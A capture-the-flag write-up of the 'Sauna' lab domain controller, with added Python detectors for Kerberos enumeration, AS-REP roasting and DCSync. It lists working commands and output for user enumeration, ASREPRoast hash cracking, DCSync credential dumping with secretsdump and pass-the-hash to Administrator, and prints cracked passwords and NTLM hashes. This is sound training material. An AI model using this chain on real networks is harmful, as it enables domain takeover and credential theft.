Sauna

Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.175 -oN allPorts
-sS: use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000: nmap will try to keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane mode, the fastest of nmap's timing templates.
-Pn: assume the host is online (skip host discovery).
-n: scan without reverse DNS resolution.
-oN: save the scan result into a file, in this case the allPorts file.
# Nmap 7.93 scan initiated Sat Apr 1 12:34:41 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.051s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49668/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49677/tcp open unknown
49689/tcp open unknown
49698/tcp open unknown
# Nmap done at Sat Apr 1 12:35:21 2023 -- 1 IP address (1 host up) scanned in 39.58 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p53,80,88,135,139,445,464,593,636,3268,3269,5985,9389,49668,49673,49674,49677,49689,49698 10.10.10.175 -oN targeted
-sC: perform the scan using the default set of scripts.
-sV: enable version detection.
-oN: save the scan result into a file, in this case the targeted file.
# Nmap 7.93 scan initiated Sat Apr 1 12:36:27 2023 as: nmap -sCV -p53,80,88,135,139,445,464,593,636,3268,3269,5985,9389,49668,49673,49674,49677,49689,49698 -Pn -n -oN targeted 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.042s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-01 17:36:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m01s
| smb2-time:
| date: 2023-04-01T17:37:28
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 1 12:38:03 2023 -- 1 IP address (1 host up) scanned in 95.96 seconds
Let's start by enumerating the SMB service. As we can see, the domain is EGOTISTICAL-BANK.LOCAL.
crackmapexec winrm 10.10.10.175
SMB 10.10.10.175 5985 SAUNA [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP 10.10.10.175 5985 SAUNA [*] http://10.10.10.175:5985/wsman
Let's add the found domain, together with the SAUNA.EGOTISTICAL-BANK.LOCAL subdomain, to the /etc/hosts file.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
f02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL SAUNA.EGOTISTICAL-BANK.LOCAL
As port 88 (Kerberos) is open, we could enumerate possible domain users with the kerbrute tool.
kerbrute_linux_amd64 userenum --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL /opt/SecLists/Usernames/xato-net-10-million-usernames.txt
Version: v1.0.3 (9dad6e1) - 04/02/23 - Ronnie Flathers @ropnop
2023/04/02 12:06:32 > Using KDC(s):
2023/04/02 12:06:32 > 10.10.10.175:88
2023/04/02 12:06:41 > [+] VALID USERNAME: administrator@EGOTISTICAL-BANK.LOCAL
2023/04/02 12:07:29 > [+] VALID USERNAME: hsmith@EGOTISTICAL-BANK.LOCAL
2023/04/02 12:07:37 > [+] VALID USERNAME: Administrator@EGOTISTICAL-BANK.LOCAL
2023/04/02 12:08:05 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2023/04/02 12:12:24 > [+] VALID USERNAME: Fsmith@EGOTISTICAL-BANK.LOCAL
Exploitation
Now that we know some valid users, let's put them into the users file and try to perform an ASREPRoast attack.
impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -no-pass -usersfile users
-no-pass: don't ask for a password.
-usersfile: file which contains one user per line.
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User administrator@EGOTISTICAL-BANK.LOCAL doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hsmith@EGOTISTICAL-BANK.LOCAL doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator@EGOTISTICAL-BANK.LOCAL doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$Fsmith@EGOTISTICAL-BANK.LOCAL@EGOTISTICAL-BANK.LOCAL:0d955097f63d940fcdd84389bb289a27$8c2f6a716e24da9a3fe893d579efaed9752a1453e7e8a13d6dadaa66a777612338cfacc659b0a5f493f84e435e64e0d837d5969bc9bce1419af0ef353233ae4e3e735ecc909035e4e3aa92b7c7df587cd1408d4fe9a5f551b5073d9ffd0726687b4beb3d4c2f7e40d065535a2271c6ce222d2d3f636d37785cd962789b2f500acb89e71f55288e588033272b56700411286a1c25b2f7112108da85aca7c636bb119f37a594276c73dd3747fd4502cc80608f9cef6dbe6aa4770e7bd66e39692281fc3eca6af908bb4859de0a03a79fd46bca7661b3241ecaa521a12121dc6a487eb86ff2d0ef01fc0664f59f945f5c0740fc29f9bea6e205524f75bb17f091e8
We get the hash of the fsmith user. Let's crack it with john.
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23 ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:07 DONE (2023-04-02 12:21) 0.1251g/s 1319Kp/s 1319Kc/s 1319KC/s Thing..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
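Both Kerberos steps above, the kerbrute username enumeration and the ASREPRoast, leave traces in the domain controller's Security log as event 4768 (a Kerberos TGT was requested). The detection logic below is an added example, not part of the original writeup: it runs over constructed 4768 records and constructed userAccountControl values (ENUM_THRESHOLD and the sample IPs are assumptions) and reports enumeration sources, TGTs issued without pre-authentication, and accounts that still have DONT_REQ_PREAUTH set.

```python
# Added detection example (not part of the original writeup). The 4768 events,
# IP addresses and userAccountControl values below are constructed sample data.
from collections import defaultdict

UF_DONT_REQUIRE_PREAUTH = 0x400000   # userAccountControl bit that GetNPUsers looks for
ENUM_THRESHOLD = 3                   # assumed: unknown principals per source before alerting

# Constructed Security event 4768 (TGT requested) records. Status 0x6 is
# KDC_ERR_C_PRINCIPAL_UNKNOWN and 0x0 is success; PreAuthType 0 means no
# pre-authentication data was sent (2 is an encrypted timestamp);
# TicketEncryptionType 0x17 is RC4-HMAC, 0x12 is AES256.
EVENTS = [
    {"TargetUserName": "aaron", "IpAddress": "10.10.14.5", "Status": "0x6", "PreAuthType": "0", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "abby", "IpAddress": "10.10.14.5", "Status": "0x6", "PreAuthType": "0", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "adam", "IpAddress": "10.10.14.5", "Status": "0x6", "PreAuthType": "0", "TicketEncryptionType": "0xffffffff"},
    {"TargetUserName": "fsmith", "IpAddress": "10.10.14.5", "Status": "0x0", "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"TargetUserName": "hsmith", "IpAddress": "10.10.10.20", "Status": "0x0", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    {"TargetUserName": "nobody", "IpAddress": "10.10.10.20", "Status": "0x6", "PreAuthType": "0", "TicketEncryptionType": "0xffffffff"},
]

# Constructed userAccountControl values as an LDAP query would return them.
SAMPLE_UAC = {"fsmith": 0x410200, "hsmith": 0x10200, "svc_loanmgr": 0x10200}


def asrep_roast_candidates(events):
    """TGTs issued (Status 0x0) with no pre-authentication (PreAuthType 0):
    exactly the AS-REP that can be taken away and cracked offline."""
    return [e["TargetUserName"] for e in events
            if e["Status"] == "0x0" and e["PreAuthType"] == "0"]


def enumeration_sources(events, threshold=ENUM_THRESHOLD):
    """Source IPs that asked for at least `threshold` distinct non-existent
    principals, the pattern kerbrute userenum leaves in the log."""
    unknown = defaultdict(set)
    for e in events:
        if e["Status"] == "0x6":
            unknown[e["IpAddress"]].add(e["TargetUserName"].lower())
    return {ip: sorted(names) for ip, names in unknown.items() if len(names) >= threshold}


def preauth_disabled(accounts):
    """Accounts whose userAccountControl has DONT_REQ_PREAUTH set; clearing
    that bit is the fix that removes the ASREPRoast exposure."""
    return sorted(name for name, uac in accounts.items() if uac & UF_DONT_REQUIRE_PREAUTH)


if __name__ == "__main__":
    print("TGTs issued without pre-auth:", asrep_roast_candidates(EVENTS))
    print("enumeration sources:", enumeration_sources(EVENTS))
    print("pre-auth disabled:", preauth_disabled(SAMPLE_UAC))
```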
Now we have valid credentials for the fsmith user.
crackmapexec winrm 10.10.10.175 -u "fsmith" -p "Thestrokes23"
SMB 10.10.10.175 5985 SAUNA [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP 10.10.10.175 5985 SAUNA [*] http://10.10.10.175:5985/wsman
WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)
As seen above, the fsmith user seems to be a member of the Remote Management Users group, because it is possible to get a shell as him via WinRM. Then we'll be able to grab the user flag.
evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents> type \users\fsmith\desktop\user.txt
99bb03df1359aa92126e0ac4bb06e325
Privilege Escalation
If you try to enumerate the system manually, you will not find much. Let's run WinPEAS and see what it tells us.
Upload the binary to the system, and execute it.
upload /home/alfa8sa/tools/privEsc/winPEASany.exe
.\winPEASany.exe
...
Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
...
It found credentials for the svc_loanmanager user. That user does not exist, but there is a user with a similar name, svc_loanmgr.
net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.
Let's verify that the credentials are valid.
crackmapexec winrm 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'
SMB 10.10.10.175 5985 SAUNA [*] Windows 10.0 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
HTTP 10.10.10.175 5985 SAUNA [*] http://10.10.10.175:5985/wsman
WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! (Pwn3d!)
Now we need to find a way to escalate privileges to NT AUTHORITY\SYSTEM. As we are facing a domain controller, it would be helpful to run BloodHound with the bloodhound-python tool.
bloodhound-python -c All -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!' -ns 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 08S
Now, we have to start BloodHound. First, we have to start neo4j.
neo4j console
Then browse to localhost on port 4747 and log in with the username neo4j and password neo4j. You'll have to change the password.
On a new console, run BloodHound.
bloodhound -nosandbox
Then log in with the credentials you set up earlier.

Then, click on the Upload Data button on the right and select all the .json files.

Once all the .json files are uploaded, go to the Analysis section. There we'll see that the svc_loanmgr user has DCSync rights.

As we have his credentials, we can dump the hashes of every local user remotely with secretsdump.
impacket-secretsdump EGOTISTICAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:7c56034d7a5cc6607a1358ec119db26b:::
[*] Kerberos keys grabbed
[*] Cleaning up...
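A DCSync like the one above is, to the domain controller, an ordinary directory replication request, so it surfaces in the Security log as event 4662 on the domain object with the DS-Replication-Get-Changes control-access rights, performed by an account that is not a domain controller. The detection below is an added example, not part of the original writeup: the 4662 records are constructed, and the DOMAIN_CONTROLLERS allow-list is an assumption for this lab.

```python
# Added detection example (not part of the original writeup). The event 4662
# records below are constructed sample data; the rights GUIDs are the real
# Active Directory control-access rights that replication (and DCSync) needs.
import re

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DOMAIN_CONTROLLERS = {"SAUNA$"}   # assumed allow-list: only DC machine accounts replicate
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.IGNORECASE)

# Constructed Security event 4662 (operation performed on an object) records.
# Properties carries the control-access GUIDs; AccessMask 0x100 is Control Access.
# The GUID in the third record is a constructed placeholder for an unrelated right.
EVENTS = [
    {"SubjectUserName": "svc_loanmgr", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "SAUNA$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "hsmith", "AccessMask": "0x10",
     "Properties": "{00000000-0000-0000-0000-000000000001}"},
]


def replication_rights(properties):
    """Names of the replication rights present in a 4662 Properties field."""
    return sorted({REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
                   if g.lower() in REPLICATION_RIGHTS})


def dcsync_alerts(events, dcs=DOMAIN_CONTROLLERS):
    """(account, rights) for every non-DC principal that exercised replication
    rights. DC machine accounts replicate legitimately and are skipped."""
    alerts = []
    for e in events:
        rights = replication_rights(e["Properties"])
        if rights and e["SubjectUserName"].upper() not in dcs:
            alerts.append((e["SubjectUserName"], rights))
    return alerts


if __name__ == "__main__":
    for account, rights in dcsync_alerts(EVENTS):
        print(f"possible DCSync by {account}: {', '.join(rights)}")
```

Event 4662 is only written when the Audit Directory Service Access subcategory is enabled and the domain object carries a SACL covering these rights, so check the audit policy before relying on this rule.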
Now that we have the NTLM hash of the administrator, we can get a shell using Pass The Hash. Then, all we have to do is reap the harvest and take the root flag.
evil-winrm -i 10.10.10.175 -u 'administrator' -H 823452073d75b9d1cf70ebdf86c7f98e
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
6eaf06be24b9c3df464cdd242bf7ebb4